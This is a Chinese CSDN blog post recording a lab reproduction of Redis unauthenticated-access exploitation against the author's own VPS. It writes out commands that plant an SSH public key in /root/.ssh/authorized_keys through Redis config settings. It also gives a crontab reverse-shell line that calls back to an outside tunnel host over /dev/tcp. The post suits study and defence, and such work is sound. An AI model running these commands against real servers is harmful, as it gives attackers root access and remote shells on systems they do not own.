redis未授权复现(二)

最新推荐文章于 2022-09-22 23:29:54 发布
最新推荐文章于 2022-09-22 23:29:54 发布
阅读量144 收藏
点赞数
分类专栏: 网络安全学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_39504221/article/details/116308697
版权

靶机vps:ubantu

靶机ip:50.7.61.25
安装一个redis

wget http://download.redis.io/releases/redis-2.8.12.tar.gz 
tar -xzf redis-2.8.12.tar.gz
cd redis-2.8.12
make
cd src
./redis-cli -h

出现帮助菜单即安装成功
在这里插入图片描述

apt-get update
apt-get install redis-server
redis-server --port 8080

在这里插入图片描述
在靶机的8080端口启动redis

攻击机kali

如果kali没安装redis的话,参照上文安装即可
尝试连接靶机redis

./redis-cli -h 50.7.61.25 -p 8080

在这里插入图片描述
执行info命令有回显说明存在漏洞

利用方式

  1. ssh免密钥登录
  2. crontab反弹shell
  3. 对redis数据库写马拿shell
  4. 利用现有exp
(1)ssh免密钥登录

原理就是在数据库中插入一条数据,将本机的公钥作为value,key值随意,然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里,这样就可以再服务器端的/root/.ssh下生一个授权的key。

首先在自己的电脑上生成key,我这里是空key

ssh-keygen -t rsa
cd /root/.ssh/

在这里插入图片描述
在这里插入图片描述
将公钥导入key.txt文件(前后用\n换行,避免和Redis里其他缓存数据混合),再把key.txt文件内容写入目标主机的缓冲里:

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
cd /root/桌面/redis-2.8.12/src
cat /root/.ssh/key.txt | ./redis-cli -h 50.7.61.25 -p 8080 -x set xxx

在这里插入图片描述
连接靶机的Redis

./redis-cli -h 50.7.61.25 -p 8080

设置redis的备份路径为/root/.ssh和保存文件名authorized_keys

config set dir /root/.ssh
 
config set dbfilename authorized_keys

save

在这里插入图片描述
ssh连接靶机

ssh 50.7.61.25

在这里插入图片描述

(2)crontab反弹shell

kali使用nc监听一个端口
然后kali连接靶机redis

./redis-cli -h 50.7.61.25 -p 8080

注:默认端口6379,这里我在靶机启动redis时是在8080端口启动的

设置备份路径与保存文件名(这里是centos的cron目录,ubantu看下文)

config set dir /var/spool/cron
config set dbfilename root

在这里插入图片描述
设置crontab任务

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/server.natappfree.cc/34409 0>&1\n\n"
save

我这里的ip用natapp做了个内网穿透,直接将shell弹到我的win10真实机上

在win10真实机上监听端口
在这里插入图片描述
1分钟后直接失败
看了https://xz.aliyun.com/t/5665#toc-8后
发现错误在于我的vps是ubantu系统

因为默认redis写文件后是644的权限,但ubuntu要求执行定时任务文件/var/spool/cron/crontabs/权限必须是600也就是-rw-------才会执行,否则会报错(root) INSECURE MODE (mode 0600 expected),而Centos的定时任务文件/var/spool/cron/权限644也能执行

参考
https://blog.csdn.net/guxiaoguo/article/details/78913245
https://blog.csdn.net/Jiajiajiang_/article/details/81368212
https://blog.csdn.net/qq_40989258/article/details/103278810?utm_medium=distribute.pc_relevant.none-task-blog-baidujs_baidulandingword-0&spm=1001.2101.3001.4242
https://xz.aliyun.com/t/5665#toc-8

L1s4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Redis授权访问getshell》复现笔记(
limb0的博客
09-16 500
Redis授权访问getshell》复现笔记(复现完了写马getshell,我们再来复现一下利用crontab反弹shell: 使用nc.exe在攻击机上监听9999端口: nc –lvvp 9999 还是使用Redis Clinet写入如下命令 config set dir /var/spool/cron config set dbfilename root set xxx "\n...
redis授权访问漏洞三种提权方式
FryhRx的博客
04-10 8749
redis授权访问漏洞三种提权方式 文章目录redis授权访问漏洞三种提权方式前言一、redis是什么?、漏洞利用条件1. redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网。2.没有设置密码认证(一般为空),可以免密码远程登录redis服务。三、漏洞利用1、利用redis写webshell2、写ssh-keygen公钥然后使用私钥登陆3、Redis 写入计划任务四、 Redis授权访问防御方法 前言 扫描/连接默认的63
NatApp+OpenResty+Redis实现内网穿透自主IP授权
进步每一天
08-23 552
使用NatApp均能解决内网IP+端口映射到公网IP+端口的问题,但是无法控制访问来源,如果你的系统比较敏感又需要控制访问源,则可以使用NATAPP+OpenResty+Redis的方案实现内网穿透的自主IP授权。 内网穿透简介 内网穿透简单来说就是将内网外网通过应用级的隧道打通,让内网的数据让外网可以获取。 有如下典型的使用场景 本地开发环境内网穿透 支付回调 单点登录回调 数据推送 公司内网穿透 访问内网的办公软件 临时web系统演示 内部gitlab私密共享 家庭内网穿透 远程控制放在
Redis授权访问漏洞复现
xunhuanmao的博客
09-22 2151
Redis授权访问漏洞的环境搭建以及利用方式。
Redis漏洞利用的4种方法
qq_50854662的博客
05-13 4553
Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)POC
09-29
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)exploit Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题...
redis数据库的GitHub poc流量包
07-16
redis授权访问流量包配合复现文章使用
基于SpringBoot+SpringCloud微服务构建的网盘系统
04-08
这些文档对于理解和复现项目至关重要,尤其对于初学者来说,可以作为学习微服务架构和Spring生态系统的实践案例。 总的来说,这个基于SpringBoot+SpringCloud的网盘系统项目展示了微服务架构在实际应用中的优势,...
Redis 授权访问漏洞复现
huangyongkang666的博客
05-01 3163
Redis 授权访问漏洞复现 1.Redis 简介 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis是一个开源的、使用c语言编写的NoSQL数据库。 Redis基于内存运行并支持持久化(支持存储在磁盘),采用key-value(键值对)的存储形式,是目前分布式架构中不可或缺的一环。 Redis器程序是单进程模型 Red
Redis漏洞总结
weixin_42345596的博客
09-19 2848
Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新
Redis系列漏洞总结
极光时流
10-06 5860
Redis系列漏洞总结 文章目录Redis系列漏洞总结环境:ubuntu16.04,redis5.0.1redis下载及安装redis 漏洞利用方式0x01 绝对路径写shell0x02 redis 写入ssh公钥0x03 Redis主从复制getshellredis 主从结合ssrf0x04redis利用crontab定时任务反弹getshell(此方式只针对centos服务器) 环境:ubuntu16.04,redis5.0.1 redis下载及安装 下载 wget http://download.
Redis授权访问漏洞是什么?如何复现(包括整理出在复现过程中遇到的各种问题)+编写扫描检测脚本
sGanYu
03-19 6363
目录 Redis授权访问漏洞原理 环境配通常来说置:CentOS下安装Redis 手工授权访问验证 利用方式 在攻击机中使用ssh免密登陆靶机 利用漏洞写入webshell 编写脚本检测 授权访问漏洞可以理解为安全配置不当、在需要进行权限认证处对当前用户进行权限识别,导致攻击者在没有获取到登录权限或授权的情况下,对目标进行操作或者被信息泄露 常见的授权漏洞: Redis 授权访问漏洞 MongoDB 授权访问漏洞 JBOSS 授权访问漏洞 VNC 授权访问漏洞 宝塔
Redis授权访问配合SSH key的综合利用
hyy615545936的博客
09-11 1542
【实验原理】 利用 Redis 自身的提供的config命令,可以进行写文件操作,恶意访问者可以成功将自己的公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中,进而可以直接使用对应的私钥登录目标服务器。 步骤一:在本地生产公私钥文件 linux系统行使用命令ssh-keygen -t rsa生成本地公钥和私钥文件,输入密码口令;如下其显示成功生成公...
Redis授权访问漏洞复现的(三种方式)
永不垂头的博客
12-30 3536
Redis授权访问漏洞复现(三种方式) 一、Redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 、漏洞简介及危害 漏洞简介 Redis因配置不当就会导致授权访问。在默认情况下,Redis会绑定在 0.0.0.0:6379。如果没有采用相关的策略,比如添加防火墙规则避免其他非信
Redis在SSRF中的应用
anquanzushiye的博客
05-29 966
作者:yunying转载来源:https://www.cnblogs.com/BOHB-yunying/p/12962057.html文章确实不错,可以点个收藏之后在电脑端慢慢复现。文章...
kali验证redis授权访问提示找到命令redis-cli
Bul1et的博客
01-16 2619
之前装kali可能时间太久远了 每次验证redis授权访问直接打开kali验证即可,前段时间由于某些原因卸载了kali,等我再装好kali验证redis授权漏洞时候 一直提示找到命令redis-cli 百度的解决方法查看了好多都是不完整的,比较完整的例如这篇 https://www.cnblogs.com/bmjoker/p/9548962.html 我说一下我装的流程,希望可以...
Redis 中的 info 系统状态说明
norang的博客
09-03 666
这里写目录标题14.1 info系统状态说明14.1.1 命令说明14.1.2 详细说明1.Server2.Clients3.Memory4.Persistence5.Stats6.Replication7.CPU8.Commandstats9.Cluster10.Keyspace参考目录 14.1 info系统状态说明 14.1.1 命令说明 info命令的使用方法有以下三种:       ·info:部分Redis系统状态统计信息。 &nbsp
Redis授权访问漏洞
最新发布
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值